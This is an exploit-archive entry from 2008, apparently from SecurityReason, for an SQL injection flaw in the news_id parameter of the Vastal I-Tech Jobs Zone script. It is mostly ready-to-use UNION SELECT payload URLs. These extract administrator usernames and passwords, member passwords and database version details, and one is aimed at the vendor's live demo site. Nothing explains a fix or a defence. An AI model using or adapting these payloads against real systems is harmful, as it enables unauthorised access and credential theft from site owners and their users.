Topic : | Vastal I-Tech Jobs Zone (news_id) SQL Injection Vulnerability
|
ExploitAlert : 4606
SecurityAlert : 4358 (Exploit Details)
Milw0rm ID : 6378
Credit : Stack
Date : 07.09.2008
Download
Plain text version
 Exploit Code : #######################################################
# Vastal I-Tech Jobs Zone SQL Injection Vulnerability
#
# Author : Stack
#
#
# Script Home Page :
http://www.vastal.com/jobs-zone-classifieds-script.html
#
# Demo : http://www.vastal.com/jobs/
#######################################################
Exploit:
http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0
x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0
x3a,password,user()),version(),4,5,6,7/**/from/**/members/*
Live Demo
http://www.vastal.com/jobs/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1
,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users
/*
###########################################################################
###################################
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|